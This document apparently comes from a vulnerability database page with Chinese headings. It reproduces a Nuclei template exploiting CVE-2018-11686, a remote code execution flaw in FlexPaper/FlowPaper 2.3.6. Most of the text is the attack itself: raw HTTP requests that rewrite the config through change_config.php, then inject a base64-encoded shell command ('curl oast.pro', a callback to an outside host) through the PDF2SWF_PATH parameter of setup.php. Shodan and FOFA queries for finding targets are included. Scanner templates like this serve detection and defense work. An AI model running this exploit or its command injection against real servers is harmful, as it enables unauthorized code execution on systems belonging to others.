漏洞描述
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
CVE-2018-11686: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
PoC代码[已公开]
id: CVE-2018-11686
info:
name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
author: iamnoooob,pdresearch,pszyszkowski
severity: critical
description: |
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11686
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-11686
cwe-id: CWE-20
epss-score: 0.90323
epss-percentile: 0.9958
cpe: cpe:2.3:a:flowpaper:flowpaper:2.3.6:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: flowpaper
product: flowpaper
shodan-query: title:"FlexPaper"
fofa-query: title="FlexPaper"
tags: cve,cve2018,flexpaper,flowpaper,rce
variables:
cmd: "curl oast.pro"
cmd_b: "{{base64(cmd)}}"
http:
- raw:
- |
POST /php/change_config.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAVE_CONFIG=1&SWF_Directory=config/
- |
POST /php/change_config.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAVE_CONFIG=1&SWF_Directory=config/
matchers:
- type: dsl
dsl:
- 'contains(header, "index.php?msg=Configuration%20saved!")'
- 'status_code == 302 || status_code == 200'
condition: and
internal: true
- raw:
- |
GET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1
Host: {{Hostname}}
- |
GET /php/config/output.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2, "Interactsh Server")'
- 'contains(content_type_2, "text/plain")'
- 'contains(location_1, "index.php")'
condition: and
# digest: 490a0046304402204294a010d931b5e0fc919cea989f0517d649a83579d6e05a7e02bfdc1cedf81e0220217e8cf02c3525df35c38d716321eabf144c26fe18b0280334a4b5bc50493cb9:922c64590222798bb761d5b6d8e72950